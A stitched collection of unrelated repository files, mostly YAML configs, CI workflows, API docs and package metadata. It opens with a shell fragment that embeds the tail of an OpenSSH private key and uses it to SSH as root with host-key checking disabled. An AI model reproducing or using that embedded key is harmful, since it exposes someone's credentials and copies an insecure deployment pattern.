w89tU8QzlqgBgZc8Sxz7igeM3wnbT9bEKc+WPe1pkiLDBPnjG1HHRiqeztbs2tl9/s7bFV
JQ+en6YVDPMTnOatXsTTwdNVXzHAfQAAAAMBAAEAAAGAVwtVPWWBBrc9q1JdL21Yt/Yze/
ibNJNX13E/cYHJ3348y/IWvA3XyNWQ7LEv55yOttSwCiRLavJ8UX9ScGPNn8ls55erCDvp
uDDUaB+NL0LdfShiPpXJuvQ5LUDzPLbWABp4E4jlqVXGpkXHbTCthP65qatVS8tUazmRKY
UBM8OlSB8KEHHXqeawg/6+qYWTd1L5CF2TgbFkiQAA3yowkBBm1qOEnmzoAwq6eWh3EFjM
WLzSqA2Uq+EJn4bUhUZCN38XXuwwHTJEO3iZMfDszUzgaDaISOX5gfOiL2OCsiGYDhjXnL
X1o3Lw8f5RqWhkeKjvBS73kRx7mQnsWh+B5tnVflLcAVJmxgaa1bIQdqpmEX7kUMsyAtrW
8uk+oi7/WwnHZsfR9TeQeldxNl50lQzqWPJcC/6nxEXtGnJelrDA+RbyYtlw4b3m4swFq2
vqwoiqHoErNHijol4Ws6RjqqpEOL/rh9qf/FuAFE9Cz5/DUUbU8tBTYIM8qsiXxvNZAAAA
wGpo+JsCWJ+bG4cfDBSt4hdSKkisPB9N11PBDt+Yw+lf164yLCr5PY+1DheJGz8YhsyMSd
3JlbLcQwH+0VT1mSWGcIKWXjjcNBGRdhT/AmAUUOlWZIVlhNgQjsd1rudo8VGgwBOimqT6
a+59d5YgPTHJDsmiMCL6zsA+gmkLjEjMf12J9spUkIUGZ/OiTjHf4dIS/gLI0HuWIkdvdL
4JBsP5Xpc1i25r2g+/fKtQY4MfbFBIa5e8U5ShkKIp7n+bhgAAAMEA/kqzWHdqaiKTxUNK
Aq4EVb5Chf8kJx07f6ntlsjDmwtCAE5fJJGoz8lZ+hBE+vPpnZ1vtssbwx7cglnEt7WiJn
er2+7GaJJAYZwjxZX7Ti1SoyCegRI/ERd66AuYJJUFiYYOz5u/h5rewXygfYgH/8cthZ36
K03gncYg8hdS3G+GldLvXLuLZVT1SWEUeaBdw0PcMhI+mC/j54vTdx66axjECt2D9PFmi9
AeZx5+9ZJgMndkL5bixDdLDGOInEyTAAAAwQD1vWi4DF7daD/qEMFT9QVzSk4P6gbZp8Bm
nWDXjnY1Eh+T1HJOWZFoMFDrRWYy7IgJlnHBSEX3YdcNmhUBOPIxKGRUN4CbMxxv191Gjy
V9YOkoFcoTw0d9ZuOUXgukuQ3UGVA7CoQsWux6q7GHortxaA0W0s2h52ZIIxuXqzy7jOxl
Zs1SoP4GL9FWb+3t/p8bGgo1KaE/TxIWcEG3+p2aFYc24dIQSnc686MK6569q8773vPAV1
TMjM71VTsJ+K8AAAAkc3JpZWRqeEBTcmVla2FudGhzLU1hY0Jvb2stUHJvLmxvY2FsAQID
BAUGBw==
-----END OPENSSH PRIVATE KEY-----
EOF
chmod 400 .id_rsa
IPaddress=$(doctl compute droplet list mydroplet | awk 'NR==2 {print $3}')
echo "$IPaddress"
ssh -o StrictHostKeyChecking=no -i .id_rsa root@$IPaddress "sh /root/script2"
|
.github/workflows/do.yml
|
name: build
on: [push] # runs on every push
jobs:
build:
runs-on: ubuntu-latest
timeout-minutes: 10
strategy:
fail-fast: false
matrix:
node-version: [13.x]
steps:
- uses: actions/checkout@v1 # checkout latest commit
- name: Use Node.js ${{ matrix.node-version }} # set up Node.js
uses: actions/setup-node@v1
with:
node-version: ${{ matrix.node-version }}
- name: Install Dependencies # runs the npm ci command to install all dependencies
run: npm ci
env:
CI: "true"
- name: Install ESLint # installs ESLint - idk why it doesn't pull this out of the devDependencies but whatever
run: |
npm i -g eslint
npm i -D eslint
env:
CI: "true"
- name: Run ESLint # Runs ESLint on the project
run: npm run lint
env:
CI: "true"
# - name: Run Unit Tests # runs all unit tests
# run: npm test
# env:
# CI: "true"
# - name: Upload Coverage Report # runs the unit tests and uploads the coverage report from the unit tests to codecov.io
# env:
# CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
# run: npx nyc --reporter=lcov npm run test && npx codecov -t $CODECOV_TOKEN
- name: Discord success notification # sends a Discord notification
env:
DISCORD_WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
uses: Ilshidur/action-discord@master
with:
args: '✅ **SvCoreLib CI** (triggered by `{{GITHUB_ACTOR}}` on `{{GITHUB_REF}}`) was successful (see https://github.com/Sv443-Network/SvCoreLib/commit/{{GITHUB_SHA}}/checks)'
- name: Discord failure notification # sends a Discord notification
env:
DISCORD_WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
uses: Ilshidur/action-discord@master
with:
args: '🚫 **SvCoreLib CI** (triggered by `{{GITHUB_ACTOR}}` on `{{GITHUB_REF}}`) has failed (see https://github.com/Sv443-Network/SvCoreLib/commit/{{GITHUB_SHA}}/checks)'
if: failure()
|
.github/workflows/build.yml
|
homepage: http://github.com/ekmett/folds
changelog-type: markdown
hash: 7bdce304037841cff3f3312fd783e6a751e9e1c17a92f72af74784cb5749dd7e
test-bench-deps: {}
maintainer: <NAME> <<EMAIL>>
synopsis: Beautiful Folding
changelog: |
0.7.6 [2021.02.17]
------------------
* Allow building with `lens-5.*`.
* The build-type has been changed from `Custom` to `Simple`.
To achieve this, the `doctests` test suite has been removed in favor of using
[`cabal-docspec`](https://github.com/phadej/cabal-extras/tree/master/cabal-docspec)
to run the doctests.
0.7.5 [2019.09.27]
------------------
* Remove the `hlint` test suite in favor of running `hlint` directly on CI.
0.7.4
-----
* Add a library dependency on the `doctests` test suite
0.7.3
-----
* Ensure that `HLint.hs` is shipped with the library
0.7.2
-----
* Revamp `Setup.hs` to use `cabal-doctest`. This makes it build
with `Cabal-2.0`, and makes the `doctest`s work with `cabal new-build` and
sandboxes.
0.7.1
-----
* Support `pointed` 5
* Support `transformers` 0.5
* Support `comonad` 5
* Support GHC 8
* Cleaned up the new warnings caused by `profunctors` 5.2
0.7
-----
* Folds are closed, corepresentable profunctors. This observation supplies us with many additional useful instances.
0.6.3
-------
* `reflection` 2 support
* Compiles warning-free on GHC 7.10
0.6.2
-----
* `contravariant` 1.0 support
0.6.1
-----
* Fixed bugs in several of the `Arrow` instances.
0.6
---
* Lazier `R1`.
* `MonadZip` instances
0.5.1
-----
* Lazier `R`.
0.5.0.1
-------
* Restore compatibility with GHC < 7.8
0.5
---
* `lens` 4 compatibility
0.1
---
* Repository Initialized
basic-deps:
semigroupoids: '>=4 && <6'
data-reify: '>=0.6 && <0.7'
reflection: '>=1.3 && <3'
base: '>=4 && <5'
comonad: '>=4 && <6'
pointed: '>=4 && <6'
unordered-containers: '>=0.2 && <0.3'
adjunctions: '>=4.2 && <5'
distributive: '>=0.3 && <1'
constraints: '>=0.4 && <1'
lens: '>=4 && <6'
bifunctors: '>=4 && <6'
contravariant: '>=0.4.2 && <2'
mtl: '>=2.0.1 && <2.3'
transformers: '>=0.3 && <0.6'
profunctors: '>=5 && <6'
vector: '>=0.10 && <0.13'
all-versions:
- '0.1'
- '0.2'
- '0.3'
- 0.5.0.1
- '0.6'
- 0.6.1
- 0.6.2
- 0.6.3
- '0.7'
- 0.7.1
- 0.7.2
- 0.7.3
- 0.7.4
- 0.7.5
- 0.7.6
author: <NAME>
latest: 0.7.6
description-type: markdown
description: |
folds
======
[](https://hackage.haskell.org/package/folds) [](https://github.com/ekmett/folds/actions?query=workflow%3AHaskell-CI)
A playground for working with different kinds of comonadic folds.
Contact Information
-------------------
Contributions and bug reports are welcome!
Please feel free to contact me through github or on the #haskell IRC channel on irc.freenode.net.
-<NAME>
license-name: BSD-3-Clause
|
packages/fo/folds.yaml
|
root: true
parser: vue-eslint-parser
extends:
- 'plugin:vue/essential'
- 'eslint:recommended'
env:
es6: true
node: true
browser: true
parserOptions:
parser: babel-eslint
sourceType: module
ecmaVersion: 2018
ecmaFeatures:
globalReturn: false
modules: true
experimentalObjectRestSpread: true
globals:
BigInt: true
rules:
require-yield:
- off
no-extra-parens:
- off
no-prototype-builtins:
- error
no-template-curly-in-string:
- error
array-callback-return:
- error
block-scoped-var:
- error
complexity:
- warn
curly:
- error
default-case:
- error
dot-location:
- error
- property
dot-notation:
- error
eqeqeq:
- error
no-alert:
- error
no-caller:
- error
no-else-return:
- error
no-empty-function:
- error
no-eq-null:
- error
no-eval:
- error
no-extend-native:
- error
no-extra-bind:
- error
no-floating-decimal:
- error
no-labels:
- error
no-loop-func:
- error
no-multi-spaces:
- error
no-multi-str:
- error
no-new:
- error
no-proto:
- error
no-restricted-properties:
- error
no-sequences:
- error
no-throw-literal:
- error
no-unused-expressions:
- error
no-useless-call:
- error
no-useless-return:
- error
yoda:
- error
strict:
- error
no-undef-init:
- error
no-unused-vars:
- error
handle-callback-err:
- error
array-bracket-newline:
- error
-
multiline: true
array-bracket-spacing:
- error
array-element-newline:
- off
-
multiline: true
brace-style:
- error
- stroustrup
camelcase:
- error
comma-dangle:
- error
- always-multiline
comma-spacing:
- error
comma-style:
- error
computed-property-spacing:
- error
eol-last:
- error
func-call-spacing:
- error
id-length:
- error
-
min: 2
exceptions:
- i
- x
- y
- e
- a
- b
id-match:
- error
- "^(([A-Za-z0-9]+){2,})|([A-Z][A-Z_0-9]+)|x|y|a|b|i|e$"
-
properties: false
onlyDeclarations: true
indent:
- error
- 2
-
SwitchCase: 1
key-spacing:
- error
keyword-spacing:
- error
max-statements-per-line:
- error
newline-per-chained-call:
- error
no-bitwise:
- error
no-multi-assign:
- error
no-trailing-spaces:
- error
no-whitespace-before-property:
- error
no-multiple-empty-lines:
- error
-
max: 2
maxEOF: 1
one-var-declaration-per-line:
- error
quote-props:
- error
- as-needed
quotes:
- error
- single
semi:
- error
- never
space-before-blocks:
- error
- always
space-before-function-paren:
- error
- always
spaced-comment:
- error
- always
arrow-body-style:
- error
- as-needed
arrow-spacing:
- error
generator-star-spacing:
- error
no-var:
- error
no-console:
- off
no-ex-assign:
- off
lines-between-class-members:
- error
- always
-
exceptAfterSingleLine: true
no-plusplus:
- error
implicit-arrow-linebreak:
- error
- beside
padding-line-between-statements:
- error
-
blankLine: always
prev:
- const
- let
- var
next: '*'
-
blankLine: any
prev:
- const
- let
- var
next:
- const
- let
- var
operator-linebreak:
- error
- after
-
overrides:
'?': before
':': before
'+': before
object-property-newline:
- error
-
allowAllPropertiesOnSameLine: true
no-magic-numbers:
- error
-
ignore:
- -1
- 0
- 1
- 2
- 10
ignoreArrayIndexes: true
enforceConst: true
detectObjects: false
object-curly-spacing:
- error
- always
# vue/component-name-in-template-casing:
# - error
# - kebab-case
vue/max-attributes-per-line:
- error
-
singleline: 3
vue/html-self-closing:
- error
-
html:
void: always
normal: never
component: always
svg: always
math: always
vue/no-v-html: off
|
.eslintrc.yaml
|
items:
- uid: NotaFiscalNet.Core.Interfaces.ISomenteLeitura
id: ISomenteLeitura
parent: NotaFiscalNet.Core.Interfaces
children:
- NotaFiscalNet.Core.Interfaces.ISomenteLeitura.SomenteLeitura
langs:
- csharp
- vb
name: ISomenteLeitura
fullName: NotaFiscalNet.Core.Interfaces.ISomenteLeitura
type: Interface
source:
remote:
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
branch: docs
repo: <EMAIL>:NotaFiscalNet/NotaFiscalNet.git
id: ISomenteLeitura
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
startLine: 5
assemblies:
- NotaFiscalNet.Core
namespace: NotaFiscalNet.Core.Interfaces
summary: "\r\nInterface que define a estrutura de um tipo que pode conter a situação de Apenas-Leitura.\r\n"
example: []
syntax:
content: public interface ISomenteLeitura
content.vb: Public Interface ISomenteLeitura
modifiers.csharp:
- public
- interface
modifiers.vb:
- Public
- Interface
- uid: NotaFiscalNet.Core.Interfaces.ISomenteLeitura.SomenteLeitura
id: SomenteLeitura
parent: NotaFiscalNet.Core.Interfaces.ISomenteLeitura
langs:
- csharp
- vb
name: SomenteLeitura
fullName: NotaFiscalNet.Core.Interfaces.ISomenteLeitura.SomenteLeitura
type: Property
source:
remote:
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
branch: docs
repo: <EMAIL>:NotaFiscalNet/NotaFiscalNet.git
id: SomenteLeitura
path: src/NotaFiscalNet.Core/Interfaces/ISomenteLeitura.cs
startLine: 7
assemblies:
- NotaFiscalNet.Core
namespace: NotaFiscalNet.Core.Interfaces
syntax:
content: >-
bool SomenteLeitura
{
get;
}
content.vb: ReadOnly Property SomenteLeitura As Boolean
parameters: []
return:
type: System.Boolean
modifiers.csharp:
- get
modifiers.vb:
- ReadOnly
references:
- uid: NotaFiscalNet.Core.Interfaces
isExternal: false
name: NotaFiscalNet.Core.Interfaces
fullName: NotaFiscalNet.Core.Interfaces
- uid: System.Boolean
parent: System
isExternal: true
name: Boolean
fullName: System.Boolean
- uid: System
isExternal: false
name: System
fullName: System
|
docs/src/api/NotaFiscalNet.Core.Interfaces.ISomenteLeitura.yml
|
---
#
# This is the canonical configuration for the `README.md`
# Run `make readme` to rebuild the `README.md`
#
# Name of this project
name: terraform-aws-ses-lambda-forwarder
# Logo for this project
#logo: docs/logo.png
# License of this project
license: "APACHE2"
# Canonical GitHub repo
github_repo: cloudposse/terraform-aws-ses-lambda-forwarder
# Badges to display
badges:
- name: "Build Status"
image: "https://travis-ci.org/cloudposse/terraform-aws-ses-lambda-forwarder.svg?branch=master"
url: "https://travis-ci.org/cloudposse/terraform-aws-ses-lambda-forwarder"
- name: "Latest Release"
image: "https://img.shields.io/github/release/cloudposse/terraform-aws-ses-lambda-forwarder.svg"
url: "https://github.com/cloudposse/terraform-aws-ses-lambda-forwarder/releases/latest"
- name: "Slack Community"
image: "https://slack.cloudposse.com/badge.svg"
url: "https://slack.cloudposse.com"
# Short description of this project
description: |-
This is a terraform module that creates an email forwarder using a combination of AWS SES and Lambda running the [aws-lambda-ses-forwarder](https://www.npmjs.com/package/aws-lambda-ses-forwarder) NPM module.
introduction: |-
This module provisions a NodeJS script as a AWS Lambda function that uses the inbound/outbound capabilities of AWS Simple Email Service (SES) to run a "serverless" email forwarding service.
Use this module instead of setting up an email server on a dedicated EC2 instance to handle email redirects. It uses AWS SES to receive email and then trigger a Lambda function to process it and forward it on to the chosen destination. This script will allow forwarding emails from any sender to verified destination emails (e.g. opt-in).
## Limitations
The SES service only allows sending email from verified addresses or domains. As such, it's mostly suitable for transactional emails (e.g. alerts or notifications). The incoming messages are modified to allow forwarding through SES and reflect the original sender. This script adds a `Reply-To` header with the original sender's email address, but the `From` header is changed to display the SES email address.
For example, an email sent by `<NAME> <<EMAIL>>` to `<EMAIL>` will be transformed to:
```
From: <NAME> at <EMAIL> <<EMAIL>>
Reply-To: <EMAIL>
```
To override this behavior, set a verified `fromEmail` address (e.g., `<EMAIL>`) in the config
object and the header will look like this.
```
From: <NAME> <<EMAIL>>
Reply-To: <EMAIL>
```
__NOTE__: SES only allows receiving email sent to addresses within verified domains. For more information,
see: http://docs.aws.amazon.com/ses/latest/DeveloperGuide/verify-domains.html
```
Initially SES users are in a sandbox environment that has a number of limitations. See:
http://docs.aws.amazon.com/ses/latest/DeveloperGuide/limits.html
# How to use this project
usage: |-
```hcl
variable "relay_email" {
default = "<EMAIL>"
description = "Email that used to relay from"
}
variable "forward_emails" {
type = "map"
default = {
"<EMAIL>" = ["<EMAIL>"]
"<EMAIL>" = ["<EMAIL>"]
}
description = "Emails forward map"
}
module "ses" {
source = "git::https://github.com/cloudposse/terraform-aws-ses-lambda-forwarder.git?ref=tags/0.1.0"
namespace = "${var.namespace}"
name = "${var.ses_name}"
stage = "${var.stage}"
region = "${var.ses_region}"
relay_email = "${var.relay_email}"
domain = "${var.parent_domain_name}"
forward_emails = "${var.forward_emails}"
}
```
references:
- name: "aws-lambda-ses-forwarder"
description: "A Node.js script for AWS Lambda that uses the inbound/outbound capabilities of AWS Simple Email Service (SES) to run a \"serverless\" email forwarding service."
url: "https://www.npmjs.com/package/aws-lambda-ses-forwarder"
include:
- "docs/targets.md"
- "docs/terraform.md"
# Contributors to this project
contributors:
- name: "<NAME>"
github: "goruha"
|
README.yaml
|
properties:
access_token_ttl_in_ms:
description: The TTL (Time To Live) length of time for the exchanged access token.
Measured in milliseconds. If not specified, defaults to `86400000`.
example: 15000
format: int64
maximum: 86400000
minimum: 1000
type: integer
issuer:
description: The name of the identity provider that will be issuing ID Tokens
for this API client. The `iss` claim in the JWT issued must match this string.
If not specified, defaults to the API client name.
example: https://purestorage.idp.okta.com
type: string
max_role:
description: The maximum role allowed for ID Tokens issued by this API client.
The bearer of an access token will be authorized to perform actions within the
intersection of this `max_role` and the role of the array user specified as
the `sub`. Valid values are `array_admin`, `storage_admin`, `ops_admin`, and
`readonly`. Users with the `readonly` (Read Only) role can perform operations
that convey the state of the array. Read Only users cannot alter the state of
the array. Users with the `ops_admin` (Ops Admin) role can perform the same
operations as Read Only users plus enable and disable remote assistance sessions.
Ops Admin users cannot alter the state of the array. Users with the `storage_admin`
(Storage Admin) role can perform the same operations as Read Only users plus
storage related operations, such as administering volumes, hosts, and host groups.
Storage Admin users cannot perform operations that deal with global and system
configurations. Users with the `array_admin` (Array Admin) role can perform
the same operations as Storage Admin users plus array-wide changes dealing with
global and system configurations. In other words, Array Admin users can perform
all operations.
example: storage_admin
required: true
type: string
public_key:
description: The API client's PEM formatted (Base64 encoded) RSA public key. Include
the `-----BEGIN PUBLIC KEY-----` and `-----END PUBLIC KEY-----` lines.
example: '-----BEGIN PUBLIC KEY----- <KEY>
<KEY>Q== -----END PUBLIC KEY-----'
required: true
type: string
type: object
|
html/models/FA2.1/api-client-post.yaml
|
name: TestSessionExploredWorkItemReference
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference
package: azure-devops-extension-api
summary: ''
fullName: TestSessionExploredWorkItemReference
remarks: ''
isPreview: false
isDeprecated: false
type: interface
properties:
- name: associatedWorkItems
uid: >-
azure-devops-extension-api.TestSessionExploredWorkItemReference.associatedWorkItems
package: azure-devops-extension-api
summary: >-
Workitem references of workitems filed as a part of the current workitem
exploration.
fullName: associatedWorkItems
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'associatedWorkItems: TestSessionWorkItemReference[]'
return:
description: ''
type: >-
<xref uid="azure-devops-extension-api.TestSessionWorkItemReference"
/>[]
- name: endTime
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.endTime
package: azure-devops-extension-api
summary: Time when exploration of workitem ended.
fullName: endTime
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'endTime: Date'
return:
description: ''
type: Date
- name: id
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.id
package: azure-devops-extension-api
summary: Id of the workitem
fullName: id
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'id: number'
return:
description: ''
type: number
- name: startTime
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.startTime
package: azure-devops-extension-api
summary: Time when explore of workitem was started.
fullName: startTime
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'startTime: Date'
return:
description: ''
type: Date
- name: type
uid: azure-devops-extension-api.TestSessionExploredWorkItemReference.type
package: azure-devops-extension-api
summary: Type of the workitem
fullName: type
remarks: ''
isPreview: false
isDeprecated: false
syntax:
content: 'type: string'
return:
description: ''
type: string
extends: <xref uid="azure-devops-extension-api.TestSessionWorkItemReference" />
|
docs-ref-autogen/azure-devops-extension-api/TestSessionExploredWorkItemReference.yml
|
title: Documentación de la versión preliminar de IoT Plug and Play
summary: La versión preliminar de IoT Plug and Play permite definir un modelo de dispositivo que permita a las soluciones en la nube comprender automáticamente cualquier dispositivo y empezar a interactuar con él (y todo ello sin necesidad de escribir código de dispositivo).
metadata:
title: Documentación de la versión preliminar de IoT Plug and Play
description: La versión preliminar de IoT Plug and Play permite definir un modelo de dispositivo que permita a las soluciones en la nube comprender automáticamente cualquier dispositivo y empezar a interactuar con él (y todo ello sin necesidad de escribir código de dispositivo).
services: iot-pnp
ms.service: iot-pnp
ms.topic: landing-page
author: dominicbetts
ms.author: dobett
manager: philmea
ms.date: 10/31/2019
ms.openlocfilehash: 9469adb901c2da5f814088aa8eb59121889a0b78
ms.sourcegitcommit: 25490467e43cbc3139a0df60125687e2b1c73c09
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 04/09/2020
ms.locfileid: "80998287"
landingContent:
- title: Acerca de IoT Plug and Play
linkLists:
- linkListType: overview
links:
- text: ¿Qué es IoT Plug and Play?
url: overview-iot-plug-and-play.md
- linkListType: video
links:
- text: Introducción a IoT Plug and Play
url: https://channel9.msdn.com/Shows/Internet-of-Things-Show/Introduction-to-IoT-Plug-and-Play/player
- title: Desarrollo de dispositivos
linkLists:
- linkListType: quickstart
links:
- text: Conexión de un dispositivo de ejemplo a IoT Hub
url: quickstart-connect-pnp-device-c-windows.md
- text: Conexión de un dispositivo de ejemplo a IoT Central
url: ../iot-central/core/tutorial-connect-pnp-device.md?toc=/azure/iot-central-pnp/toc.json&bc=/azure/iot-central-pnp/breadcrumb/toc.json
- text: Uso de un modelo de funcionalidad de dispositivo para crear un dispositivo
url: quickstart-create-pnp-device-windows.md
- linkListType: tutorial
links:
- text: Creación y prueba de un modelo de funcionalidad del dispositivo mediante Visual Studio Code
url: tutorial-pnp-visual-studio-code.md
- text: Compilación de un dispositivo listo para la certificación
url: tutorial-build-device-certification.md
- text: Certificación del dispositivo
url: tutorial-certification-test.md
- linkListType: how-to-guide
links:
- text: Uso de Azure IoT Tools para Visual Studio Code
url: howto-develop-with-vs-vscode.md
- text: Incorporación al portal de Azure Certified for IoT
url: howto-onboard-portal.md
- linkListType: concept
links:
- text: Interfaces comunes
url: concepts-common-interfaces.md
- title: Crear soluciones
linkLists:
- linkListType: quickstart
links:
- text: Interacción con un dispositivo que esté conectado a una solución
url: quickstart-connect-pnp-device-solution-node.md
- linkListType: concept
links:
- text: Detección de modelo
url: concepts-model-discovery.md
- text: Interfaces comunes
url: concepts-common-interfaces.md
- linkListType: how-to-guide
links:
- text: Conexión a dispositivos desde una solución
url: howto-develop-solution.md
|
articles/iot-pnp/index.yml
|
cluster_name: 'Scalar DB Cluster'
num_tokens: 256
hinted_handoff_enabled: true
max_hint_window_in_ms: 10800000
hinted_handoff_throttle_in_kb: 1024
max_hints_delivery_threads: 2
hints_flush_period_in_ms: 10000
max_hints_file_size_in_mb: 128
batchlog_replay_throttle_in_kb: 1024
authenticator: AllowAllAuthenticator
authorizer: AllowAllAuthorizer
role_manager: CassandraRoleManager
roles_validity_in_ms: 2000
permissions_validity_in_ms: 2000
credentials_validity_in_ms: 2000
partitioner: org.apache.cassandra.dht.Murmur3Partitioner
cdc_enabled: false
disk_failure_policy: stop
commit_failure_policy: stop
prepared_statements_cache_size_mb:
thrift_prepared_statements_cache_size_mb:
key_cache_size_in_mb:
key_cache_save_period: 14400
row_cache_size_in_mb: 0
row_cache_save_period: 0
counter_cache_size_in_mb:
counter_cache_save_period: 7200
commitlog_sync: batch
commitlog_sync_batch_window_in_ms: 2
commitlog_compression:
- class_name: LZ4Compressor
commitlog_segment_size_in_mb: 32
seed_provider:
- class_name: org.apache.cassandra.locator.SimpleSeedProvider
parameters:
- seeds: _SEEDS_
concurrent_reads: _CONCURRENCY_
concurrent_writes: _CONCURRENCY_
concurrent_counter_writes: 2
concurrent_materialized_view_writes: 1
memtable_cleanup_threshold: 0.67
memtable_allocation_type: offheap_buffers
index_summary_capacity_in_mb:
index_summary_resize_interval_in_minutes: 60
trickle_fsync: false
trickle_fsync_interval_in_kb: 10240
storage_port: 7000
ssl_storage_port: 7001
listen_address: _IP_
start_native_transport: true
native_transport_port: 9042
start_rpc: false
rpc_address: _IP_
rpc_port: 9160
rpc_keepalive: true
rpc_server_type: sync
thrift_framed_transport_size_in_mb: 15
incremental_backups: false
snapshot_before_compaction: false
auto_snapshot: true
column_index_size_in_kb: 64
column_index_cache_size_in_kb: 2
compaction_throughput_mb_per_sec: 16
sstable_preemptive_open_interval_in_mb: 50
read_request_timeout_in_ms: 5000
range_request_timeout_in_ms: 10000
write_request_timeout_in_ms: 2000
counter_write_request_timeout_in_ms: 5000
cas_contention_timeout_in_ms: 1000
truncate_request_timeout_in_ms: 60000
request_timeout_in_ms: 10000
slow_query_log_timeout_in_ms: 500
cross_node_timeout: false
endpoint_snitch: SimpleSnitch
dynamic_snitch_update_interval_in_ms: 100
dynamic_snitch_reset_interval_in_ms: 600000
dynamic_snitch_badness_threshold: 0.1
request_scheduler: org.apache.cassandra.scheduler.NoScheduler
server_encryption_options:
internode_encryption: none
keystore: conf/.keystore
keystore_password: <PASSWORD>
truststore: conf/.truststore
truststore_password: <PASSWORD>
client_encryption_options:
enabled: false
optional: false
keystore: conf/.keystore
keystore_password: <PASSWORD>
internode_compression: dc
inter_dc_tcp_nodelay: false
tracetype_query_ttl: 86400
tracetype_repair_ttl: 604800
enable_user_defined_functions: false
enable_scripted_user_defined_functions: false
enable_materialized_views: true
windows_timer_interval: 1
transparent_data_encryption_options:
enabled: false
chunk_length_kb: 64
cipher: AES/CBC/PKCS5Padding
key_alias: testing:1
key_provider:
- class_name: org.apache.cassandra.security.JKSKeyProvider
parameters:
- keystore: conf/.keystore
keystore_password: <PASSWORD>
store_type: JCEKS
key_password: <PASSWORD>
tombstone_warn_threshold: 1000
tombstone_failure_threshold: 100000
batch_size_warn_threshold_in_kb: 5
batch_size_fail_threshold_in_kb: 50
unlogged_batch_across_partitions_warn_threshold: 10
compaction_large_partition_warning_threshold_mb: 100
gc_warn_threshold_in_ms: 1000
back_pressure_enabled: false
back_pressure_strategy:
- class_name: org.apache.cassandra.net.RateBasedBackPressure
parameters:
- high_ratio: 0.9
factor: 5
flow: FAST
commitlog_directory: _COMMITLOG_DIR_
data_file_directories:
- _DATA_DIR_
hints_directory: _HINTS_DIR_
saved_caches_directory: _SAVED_CACHES_DIR_
|
scripts/setup/default/cassandra.yaml
|
name: CI
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
strategy:
fail-fast: false
matrix:
include:
- php-versions: '5.6'
phpunit-versions: '5.7.27'
- php-versions: '7.0'
phpunit-versions: '6.5.14'
- php-versions: '7.1'
phpunit-versions: '7.5.20'
- php-versions: '7.2'
phpunit-versions: '7.5.20'
- php-versions: '7.3'
phpunit-versions: '7.5.20'
- php-versions: '7.4'
phpunit-versions: '7.5.20'
# - php-versions: '8.0'
# phpunit-versions: '9.5.1'
name: PHP ${{ matrix.php-versions }}, PHPUnit ${{ matrix.phpunit-versions }}
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Setup PHP
uses: shivammathur/setup-php@v2
with:
php-version: ${{ matrix.php-versions }}
coverage: xdebug
tools: phpunit:${{ matrix.phpunit-versions }}
extensions: pdo_sqlite
- name: Get composer cache directory
id: composer-cache
run: echo "::set-output name=dir::$(composer config cache-files-dir)"
- name: Cache dependencies
uses: actions/cache@v2
with:
path: ${{ steps.composer-cache.outputs.dir }}
key: ${{ runner.os }}-composer-${{ hashFiles('**/composer.lock') }}
restore-keys: ${{ runner.os }}-composer-
- name: Install Dependencies
run: composer install --prefer-dist
- name: Run Tests
run: |
mkdir -p build/logs
phpunit --coverage-clover build/logs/clover.xml
- name: Downloading Scrutinizer CI binary
run: wget https://scrutinizer-ci.com/ocular.phar
- name: Upload coverage to Codecov
uses: codecov/codecov-action@v1
- name: Uploading code coverage to Scrutinizer CI
run: php ocular.phar code-coverage:upload --format=php-clover build/logs/clover.xml
|
.github/workflows/main.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-17 21:23"
game: "Unreal Tournament"
name: "CTF4-DiamondSword"
author: "'ArKile' + 'INFERNO'"
description: "None"
releaseDate: "2000-08"
attachments:
- type: "IMAGE"
name: "CTF4-DiamondSword_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/CTF4-DiamondSword_shot_1.png"
originalFilename: "ctf4diamondsword.zip"
hash: "813dee3d1c9dcc70ed7a108a4d4b6a08773d4f05"
fileSize: 1325415
files:
- name: "ctf4diamond.utx"
fileSize: 176591
hash: "99b27249f4f253411ffeaa7fd5093194a42d76ff"
- name: "Newmca16.umx"
fileSize: 447983
hash: "65e8ac37c3319392354d726fcc2c181e2a7891a2"
- name: "CTF4-DiamondSword.unr"
fileSize: 3372036
hash: "4a03966da03d8c4cecd4d86f00b4a2ef63c97dab"
otherFiles: 0
dependencies:
CTF4-DiamondSword.unr:
- status: "OK"
name: "Newmca16"
- status: "MISSING"
name: "CTF4"
- status: "OK"
name: "ctf4diamond"
downloads:
- url: "http://www.ut-files.com/index.php?dir=Maps/CTF4/&file=ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/ctf4diamondsword.zip"
main: true
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/CTF4&file=ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Maps/CTF4/ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/8/1/3dee3d/ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/Multi-Team%20CTF/D/8/1/3dee3d/ctf4diamondsword.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Multi-Team CTF"
title: "Diamond Sword (converted by Eagle)"
playerCount: "16-32"
themes:
Industrial: 0.8
